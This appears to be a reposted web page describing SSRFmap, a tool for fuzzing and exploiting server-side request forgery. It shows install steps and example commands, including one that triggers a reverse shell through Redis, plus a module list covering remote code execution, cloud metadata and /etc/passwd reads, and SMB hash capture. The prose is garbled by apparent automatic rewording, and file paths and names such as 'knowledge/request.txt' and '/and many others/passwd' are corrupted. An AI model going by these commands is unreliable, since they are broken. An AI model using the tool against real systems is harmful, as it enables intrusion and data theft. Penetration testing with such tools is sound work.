SSRFmap – Automatic SSRF Fuzzer And Exploitation Tool

0
10
SSRFmap - Automatic SSRF Fuzzer And Exploitation Tool

SSRF are sometimes used to leverage actions on different companies, this framework goals to search out and exploit these companies simply. SSRFmap takes a Burp request file as enter and a parameter to fuzz.

Server Side Request Forgery or SSRF is a vulnerability during which an attacker forces a server to carry out requests on their behalf.

Guide / RTFM
Basic set up from the Github repository.

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py

utilization: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lport LPORT] [--level LEVEL]

elective arguments:
  -h, --help     present this assist message and exit
  -r REQFILE     SSRF Request file
  -p PARAM       SSRF Parameter to focus on
  -m MODULES     SSRF Modules to allow
  -l HANDLER     Start an handler for a reverse shell
  --lhost LHOST  LHOST reverse shell
  --lport LPORT  LPORT reverse shell
  --level [LEVEL]  Level of take a look at to carry out (1-5, default: 1)

The default means to make use of this script is the next.

# Launch a portscan on localhost and browse default information
python ssrfmap.py -r knowledge/request.txt -p url -m readfiles,portscan

# Triggering a reverse shell on a Redis
python ssrfmap.py -r knowledge/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l create a listener for reverse shell on the required port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
# --level : means to tweak payloads in an effort to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...

A fast technique to take a look at the framework could be accomplished with knowledge/instance.py SSRF service.

FLASK_APP=knowledge/instance.py flask run &
python ssrfmap.py -r knowledge/request.txt -p url -m readfiles

Modules
The following modules are already applied and can be utilized with the -m argument.

Name Description
fastcgi FastCGI RCE
redis Redis RCE
github Github Enterprise RCE < 2.8.7
zaddix Zaddix RCE
mysql MySQL Command execution
docker Docker Infoleaks by way of API
smtp SMTP ship mail
portscan Scan ports for the host
networkscan HTTP Ping sweep over the community
readfiles Read information reminiscent of /and many others/passwd
alibaba Read information from the supplier (e.g: meta-knowledge, person-knowledge)
aws Read information from the supplier (e.g: meta-knowledge, person-knowledge)
digitalocean Read information from the supplier (e.g: meta-knowledge, person-knowledge)
socksproxy SOCKS4 Proxy
smbhash Force an SMB authentication by way of a UNC Path

Inspired by

MoreTip.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.